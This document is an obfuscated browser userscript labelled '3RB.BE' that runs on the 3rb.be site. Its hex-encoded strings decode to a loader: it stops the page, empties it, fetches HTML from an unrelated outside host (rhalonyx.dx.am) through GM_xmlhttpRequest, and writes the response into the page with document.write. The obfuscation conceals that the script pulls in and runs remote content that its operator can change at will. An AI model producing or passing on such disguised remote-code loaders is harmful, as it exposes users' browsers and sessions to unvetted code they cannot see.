// ==UserScript==
// @name        3RB.BE
// @namespace    ex
// @version      0.1
// @author      R7AL
// @run-at       document-start
// @match        http://3rb.be/
// @grant        GM_xmlhttpRequest
// ==/UserScript==

var _0xe524=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x73\x74\x6F\x70","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74","\x47\x45\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x68\x61\x6C\x6F\x6E\x79\x78\x2E\x64\x78\x2E\x61\x6D\x2F\x76\x2E\x31\x2E\x30\x2F\x76\x2E\x30\x2E\x30\x2E\x33\x2F\x63\x6D\x2E\x63\x6F\x64\x65\x2E\x68\x74\x6D\x6C","\x6F\x70\x65\x6E","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x77\x72\x69\x74\x65","\x63\x6C\x6F\x73\x65"];var _0x6042=[_0xe524[0],_0xe524[1],_0xe524[2],_0xe524[3],_0xe524[4],_0xe524[5],_0xe524[6],_0xe524[7],_0xe524[8],_0xe524[9]],_0xfc3e=[_0x6042[0],_0x6042[1],_0x6042[2],_0x6042[3],_0x6042[4],_0x6042[5],_0x6042[6],_0x6042[7],_0x6042[8],_0x6042[9]],_0x64a1=[_0xfc3e[0],_0xfc3e[1],_0xfc3e[2],_0xfc3e[3],_0xfc3e[4],_0xfc3e[5],_0xfc3e[6],_0xfc3e[7],_0xfc3e[8],_0xfc3e[9]],_0x70c5=[_0x64a1[0],_0x64a1[1],_0x64a1[2],_0x64a1[3],_0x64a1[4],_0x64a1[5],_0x64a1[6],_0x64a1[7],_0x64a1[8],_0x64a1[9]],_0xe547=[_0x70c5[0],_0x70c5[1],_0x70c5[2],_0x70c5[3],_0x70c5[4],_0x70c5[5],_0x70c5[6],_0x70c5[7],_0x70c5[8],_0x70c5[9]],_0xc8d1=[_0xe547[0],_0xe547[1],_0xe547[2],_0xe547[3],_0xe547[4],_0xe547[5],_0xe547[6],_0xe547[7],_0xe547[8],_0xe547[9]],_0x1830=[_0xc8d1[0],_0xc8d1[1],_0xc8d1[2],_0xc8d1[3],_0xc8d1[4],_0xc8d1[5],_0xc8d1[6],_0xc8d1[7],_0xc8d1[8],_0xc8d1[9]];_0x1830[0];var _0x1274=[_0x1830[1],_0x1830[2],_0x1830[3],_0x1830[4],_0x1830[5],_0x1830[6],_0x1830[7],_0x1830[8],_0x1830[9]];window[_0x1274[0]](),document[_0x1274[2]][_0x1274[1]]= null;var ae=document;GM_xmlhttpRequest({method:_0x1274[3],url:_0x1274[4],onload:function(_0xd4f2xa){ae[_0x1274[5]](),ae[_0x1274[7]](_0xd4f2xa[_0x1274[6]]),ae[_0x1274[8]]()}})

